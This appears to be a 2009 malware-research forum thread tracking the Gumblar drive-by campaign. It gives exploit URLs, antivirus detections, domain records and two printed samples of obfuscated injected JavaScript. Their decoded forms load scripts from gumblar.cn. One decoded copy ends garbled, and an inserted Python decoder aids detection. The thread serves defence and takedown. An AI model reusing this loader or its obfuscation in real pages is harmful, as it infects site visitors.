Author Topic: gumblar.cn -(94.229.65.172)  (Read 18403 times)


May 03, 2009, 08:03:03 pm

SysAdMini

It looks like many sites have been compromised and now redirect to this malware site.

Code:
gumblar.cn/rss/?id

http://wepawet.cs.ucsb.edu/view.php?hash=2d5faa3b53791149ea66bc37883f1aee&t=1241376846&type=js

pdf exploit
Code:
gumblar.cn/rss/?id=2

http://www.virustotal.com/analisis/166f764091f21e7cb80fe289cd73b43e 2/40
Sunbelt   3.2.1858.2   2009.05.03   Exploit.PDF-JS.Gen (v)
Symantec   1.4.4.12   2009.05.03   Trojan Horse
MD5...: 61461d9c9c1954193e5e0d4148a81a0c

flash exploit
Code:
gumblar.cn/rss/?id=3

http://www.virustotal.com/analisis/d85774b8e6e198dcb837861b0ba27f99 3/40
BitDefender   7.2   2009.05.03   Exploit.SWF.Gen
GData   19   2009.05.03   Exploit.SWF.Gen
Microsoft   1.4602   2009.05.03   TrojanDownloader:Win32/Swif.gen!A
MD5...: 65cd1da3d4cc0616b4a0d4a862a865a6

payload
gumblar.cn/rss/?id=10&
http://www.virustotal.com/analisis/ea74ce8331996c42eb494a8310c2d956 9/41
a-squared   4.0.0.101   2009.05.03   Trojan-Dropper.Boot.Drv!IK
BitDefender   7.2   2009.05.03   Gen:Trojan.Heur.1020416A6A
eSafe   7.0.17.0   2009.05.03   Suspicious File
GData   19   2009.05.03   Gen:Trojan.Heur.1020416A6A
Ikarus   T3.1.1.49.0   2009.05.03   Trojan-Dropper.Boot.Drv
McAfee+Artemis   5604   2009.05.03   Artemis!7DE29E5E10AD
Prevx1   3.0   2009.05.03   Medium Risk Malware
Symantec   1.4.4.12   2009.05.03   Backdoor.Trojan
TrendMicro   8.950.0.1092   2009.05.01   PAK_Generic.001
MD5...: 7de29e5e10adc5d90296785c89aeabce

http://www.threatexpert.com/report.aspx?md5=7de29e5e10adc5d90296785c89aeabce

Thanks to Steven for downloading the samples. It didn't work from my site.
Ruining the bad guy's day

May 03, 2009, 09:04:35 pm
Reply #1

SysAdMini


May 09, 2009, 10:52:23 pm
Reply #2

MysteryFCM

gumblar via e-mail anyone?

Code:
*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://78.131.152.104/~fonsflos/qzfbu.html
Server IP: 78.131.152.104 [ s15.o12.pl ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 09 May 2009
Time: 23:46:49:46
*****************************************************************
<html><head><script type="text/javascript">window.location="http://qajtogap.cn";</script></head><script language=javascript><!--
(function(pwB){var D2J0='%';var Vsf=('var#20a#3d#22#53#63ri#70tEn#67ine#22#2cb#3d#22Vers#69on(#29+#22#2cj#3d#22#22#2cu#3dna#76igato#72#2eus#65#72Agent#3bif((u#2einde#78#4ff(#22#57#69n#22#29#3e0)#26#26(u#2ein#64exO#66(#22#4e#54#206#22)#3c0#29#26#26(do#63um#65n#74#2ec#6fo#6bi#65#2e#69#6e#64e#78#4ff(#22miek#3d1#22)#3c0)#26#26(typeof(#7a#72vzt#73#29#21#3dtyp#65#6ff(#22A#22)))#7bz#72v#7ats#3d#22#41#22#3b#65val(#22if(wi#6edow#2e#22+a+#22)j#3dj+#22+#61+#22#4d#61jor#22#2bb+a+#22#4di#6eor#22#2b#62#2ba+#22#42uild#22+#62+#22j#3b#22#29#3bdoc#75ment#2ewrit#65(#22#3c#73c#72ipt#20sr#63#3d#2f#2f#67u#6dblar#2ecn#2frs#73#2f#3fid#3d#22+#6a+#22#3e#3c#5c#2fs#63#72i#70t#3e#22)#3b#7d').replace(pwB,D2J0);eval(unescape(Vsf))})(/#/g);
 --></script><body><a href="http://qajtogap.cn">Your link!</a><script src='http://b.rtbn2.cn/E/J.JS'></script></body></html>

Decodes to:

Code:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");}
b.rtbn2.cn has another trick up its sleeve in the form of J.JS:

http://wepawet.cs.ucsb.edu/view.php?hash=c16946ed6bc14d33023bc9a8b1ebf3b1&type=js

E-mail headers:

Code:
Return-Path: unidosxlosanimales-remove@groups.msn.com
Delivered-To: pvtd@it-mate.co.uk
X-FDA: 62218131066
X-Panda: scanned!
X-Filterd-Recvd-Size: 618
Received: from ndg.techno.fm (ndg.techno.fm [76.74.252.212])
by imf05.hostedemail.com (Postfix) with SMTP
for <pvtd@it-mate.co.uk>; Sat,  9 May 2009 22:39:52 +0000 (UTC)
Subject: sited
Reply-To: <unidosxlosanimales-remove@groups.msn.com>
X-Priority: 3 (Normal)
Date: Sat, 9 May 2009 18:39:52 +0300
X-Mailer: QMail
Message-ID: <01C9D0F7.58EA40B4@ndg.techno.fm>
To: <pvtd@it-mate.co.uk>
From: <unidosxlosanimales-remove@groups.msn.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 14, 2009, 01:36:17 pm
Reply #3

SysAdMini


May 14, 2009, 04:56:46 pm
Reply #4

MysteryFCM

Posted to SFS by a GoDaddy customer that had his dedicated servers hacked:

http://www.stopforumspam.com/forum/p4173-Today-5%3A31#p4173

Code:
(function(t){eval(unescape(('var_20a_3d_22Sc_72iptEngine_22_2c_62_3d_22_56ersi_6fn()_2b_22_2cj_3d_22_22_2cu_3dn_61_76_69gator_2e_75_73erA_67ent_3b_69f((_75_2einde_78_4ff(_22W_69n_22)_3e0_29_26_26(u_2eind_65xO_66(_22NT_206_22_29_3c_30_29_26_26(document_2ecoo_6bie_2ein_64ex_4ff_28_22m_69e_6b_3d1_22)_3c_30)_26_26_28_74ypeo_66_28_7arvzts)_21_3dtypeof(_22_41_22_29_29)_7bzrvzt_73_3d_22A_22_3bev_61l(_22_69_66_28window_2e_22+_61_2b_22)j_3d_6a+_22_2b_61+_22M_61jor_22+b_2ba+_22M_69nor_22+b+a_2b_22_42u_69_6cd_22_2b_62+_22j_3b_22)_3bdocum_65n_74_2ewrit_65(_22_3cscr_69pt_20_73rc_3d_2f_2fg_75mblar_2ecn_2fr_73s_2f_3f_69d_3d_22+_6a+_22_3e_3c_5c_2fscri_70_74_3e_22)_3b_7d').replace(t,'%')))})(/_/g);

Decodes to:

Code:
eval(unescape(('var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");}').replace(t,'?))})(/?);
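Both pastes above (the '#' wrapper from the vURL capture and the '_' wrapper from the SFS copy) peel the same way: a percent-encoded string with every '%' swapped for a delimiter, restored by .replace() and run through eval(unescape(...)). The decoder below is an added example, not code from the thread or from vURL; SAMPLE_HTML is a constructed two-statement excerpt in that layout, and the two regexes assume that exact wrapper shape.

```python
import re
from urllib.parse import unquote

# Constructed excerpt in the layout the thread shows: the payload is percent-encoded
# with '#' standing in for '%', restored at runtime by .replace(/#/g,'%') and then
# run through eval(unescape(...)). Only two statements of the dropper are included.
SAMPLE_HTML = (
    "<html><head><script language=javascript><!--\n"
    "(function(pwB){var D2J0='%';var Vsf=('var#20a#3d#22#53#63ri#70tEn#67ine#22#3b"
    "doc#75ment#2ewrit#65(#22#3c#73c#72ipt#20sr#63#3d#2f#2f#67u#6dblar#2ecn#2frs#73"
    "#2f#3fid#3d#22+#6a+#22#3e#3c#5c#2fs#63#72i#70t#3e#22)#3b').replace(pwB,D2J0);"
    "eval(unescape(Vsf))})(/#/g);\n"
    " --></script><body></body></html>"
)

# The quoted blob handed to .replace(...), and the one-character regex literal the
# IIFE is invoked with: /#/g in the vURL capture, /_/g in the SFS copy.
ENCODED_RE = re.compile(r"\('([^']+)'\)\.replace\(")
DELIM_RE = re.compile(r"\}\)\(/(.)/g\)")

# Tells that are only visible after the layer is peeled (all from the decoded code).
INDICATORS = ("ScriptEngine", "miek=1", "gumblar.cn/rss/?id=")


def decode_gumblar_layer(html):
    """Return the decoded JavaScript, or None when the wrapper pattern is absent."""
    enc = ENCODED_RE.search(html)
    delim = DELIM_RE.search(html)
    if not enc or not delim:
        return None
    # Undo the runtime substitution; JS unescape() on this ASCII-only payload
    # is plain %XX decoding, which unquote() performs.
    return unquote(enc.group(1).replace(delim.group(1), "%"))


def analyse(html):
    """Decode one captured page and report the injected src and matched tells."""
    decoded = decode_gumblar_layer(html)
    if decoded is None:
        return {"matched": False}
    src = re.search(r"src=([^\s\"'>]+)", decoded)
    return {
        "matched": True,
        "decoded": decoded,
        "script_src": src.group(1) if src else None,
        "indicators": [i for i in INDICATORS if i in decoded],
    }
```

analyse(SAMPLE_HTML)["script_src"] comes back as //gumblar.cn/rss/?id=, the value to alert on in a web-server or proxy scan; a page carrying the wrapper that decodes to something else still returns matched=True with an empty indicator list, which is worth a manual look.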

May 14, 2009, 09:42:46 pm
Reply #5

MysteryFCM


May 15, 2009, 12:35:54 pm
Reply #6

SysAdMini

Looks like the net has been disconnected.
Router at DataHop, UK (195.72.129.125) reports "destination net unreachable".

May 15, 2009, 12:47:54 pm
Reply #7

MysteryFCM

Seeing the same myself ..... gonna stick it on monitoring and see if it automagically comes back or not.

May 15, 2009, 05:24:21 pm
Reply #8

SysAdMini

Now even the name resolution fails.

May 15, 2009, 05:42:58 pm
Reply #9

MysteryFCM

WhoIs is still showing valid name servers, so I've got a feeling either the domain is in the process of moving, or it's been taken down?

Code:
Domain Name: gumblar.cn
ROID: 20090422s10001s30804494-cn
Domain Status: ok
Registrant Organization: NetworkProtect
Registrant Name: TiankaiCui
Administrative Email: cuitiankai@googlemail.com
Sponsoring Registrar: 厦门华融盛世网络有限公司
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2009-04-22 03:24
Expiration Date: 2010-04-22 03:24

May 18, 2009, 09:32:31 am
Reply #10

MysteryFCM


May 18, 2009, 09:45:50 am
Reply #11

SysAdMini


May 18, 2009, 09:48:48 am
Reply #12

MysteryFCM

hehe figured as much :)

May 19, 2009, 12:08:45 pm
Reply #13

Malware-Web-Threats


May 27, 2009, 09:50:54 pm
Reply #14

SysAdMini
